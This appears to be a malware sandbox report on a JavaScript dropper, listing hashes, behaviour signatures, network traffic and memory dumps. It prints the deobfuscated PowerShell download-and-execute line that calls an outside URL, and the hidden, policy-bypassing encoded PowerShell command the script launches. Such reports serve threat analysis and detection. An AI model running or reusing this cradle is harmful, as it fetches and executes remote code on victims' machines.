Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

bc702297b8...57d.js

windows7-x64

10

bc702297b8...57d.js

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09/03/2024, 17:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bc702297b8a3200525adca0d25e2d57d.js

  • Size

    111KB

  • MD5

    bc702297b8a3200525adca0d25e2d57d

  • SHA1

    95582f2110f2d736ae639656bdb4debe95752857

  • SHA256

    d1eb721388bb40bd56835aaea683b2505a429b5fcfdb649be066a7e8e946c1a8

  • SHA512

    72d39ddee3cd907c20f85bc2a542f36f2059ec0d1635522b5e380f502c7c1bf96460379ae87fa2c6e5b28c6cee762acc611670acaad86af1c63bead62ad31e80

  • SSDEEP

    3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXR:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("http://smart-integrator.hr/pornhub.php")
2
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\bc702297b8a3200525adca0d25e2d57d.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2552

Network

  • flag-us
    DNS
    smart-integrator.hr
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    smart-integrator.hr
    IN A
    Response
    smart-integrator.hr
    IN A
    192.250.227.36
  • flag-us
    DNS
    smart-integrator.hr
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    smart-integrator.hr
    IN A
  • flag-us
    GET
    http://smart-integrator.hr/pornhub.php
    powershell.exe
    Remote address:
    192.250.227.36:80
    Request
    GET /pornhub.php HTTP/1.1
    Host: smart-integrator.hr
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Sat, 09 Mar 2024 17:55:15 GMT
    server: LiteSpeed
    vary: User-Agent,User-Agent
  • 192.250.227.36:80
    http://smart-integrator.hr/pornhub.php
    http
    powershell.exe
    310 B
     1.7kB
     5
    4

    HTTP Request

    GET http://smart-integrator.hr/pornhub.php

    HTTP Response

    404
  • 8.8.8.8:53
    smart-integrator.hr
    dns
    powershell.exe
    130 B
     81 B
     2
    1

    DNS Request

    smart-integrator.hr

    DNS Request

    smart-integrator.hr

    DNS Response

    192.250.227.36

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2552-5-0x000000001B1A0000-0x000000001B482000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2552-6-0x0000000002830000-0x0000000002838000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2552-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2552-8-0x00000000028B0000-0x0000000002930000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2552-9-0x00000000028B0000-0x0000000002930000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2552-10-0x00000000028B0000-0x0000000002930000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2552-11-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2552-12-0x00000000028B0000-0x0000000002930000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2552-13-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.